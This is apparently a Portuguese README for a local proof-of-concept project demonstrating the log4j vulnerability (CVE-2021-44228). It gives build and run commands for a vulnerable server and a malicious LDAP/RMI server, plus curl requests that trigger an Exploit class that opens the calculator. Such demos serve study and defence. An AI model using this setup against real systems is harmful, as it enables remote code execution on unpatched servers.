
projeto de demonstração para destacar como executar a vulnerabilidade log4j (CVE-2021-44228)
projetos demo para destacar como executar a vulnerabilidade log4j (CVE-2021-44228)
usado spring boot apenas para ser configurado rapidamente. você terá que desculpar toda a codificação hardcoded, foi apenas uma POC.
Tenha o Java 8 instalado. Compile usando maven mvn clean package -DskipTests. Execute estes comandos em janelas de shell separadas:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
Isso deve executar o código na classe Exploit (que apenas abrirá a calculadora)